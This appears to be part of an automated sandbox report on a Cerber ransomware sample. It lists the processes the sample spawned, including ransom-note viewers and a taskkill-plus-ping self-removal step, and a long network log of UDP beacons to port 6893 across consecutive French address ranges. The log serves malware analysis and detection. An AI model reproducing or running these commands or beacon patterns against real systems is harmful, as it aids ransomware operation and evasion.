"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___W0HPZR_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___HRXS2A6_.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2356 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2112 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
US 8.8.8.8:53 1.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 35.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 47.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 76.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 77.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 78.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 81.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 90.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 104.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 112.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 124.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 127.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 126.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 128.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 129.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 130.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 131.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 132.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 133.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 134.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 135.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 136.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 137.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 138.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 139.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 140.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 141.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 142.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 143.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 144.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 145.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 146.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 147.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 148.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 149.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 150.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 151.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 152.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 153.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 154.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 155.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 156.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 157.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 158.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 159.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 160.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 161.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 162.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 163.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 164.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 166.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 167.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 168.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 169.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 170.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 171.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 172.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 173.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 174.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 175.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 176.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 177.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 178.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 179.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 180.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 181.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 182.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 183.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 184.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 185.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 186.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 188.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 187.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 189.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 190.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 191.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 192.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 193.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 194.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 195.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 196.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 197.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 198.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 199.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 200.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 201.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 202.160.33.178.in-addr.arpa udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
US 8.8.8.8:53 203.160.33.178.in-addr.arpa udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
US 8.8.8.8:53 204.160.33.178.in-addr.arpa udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
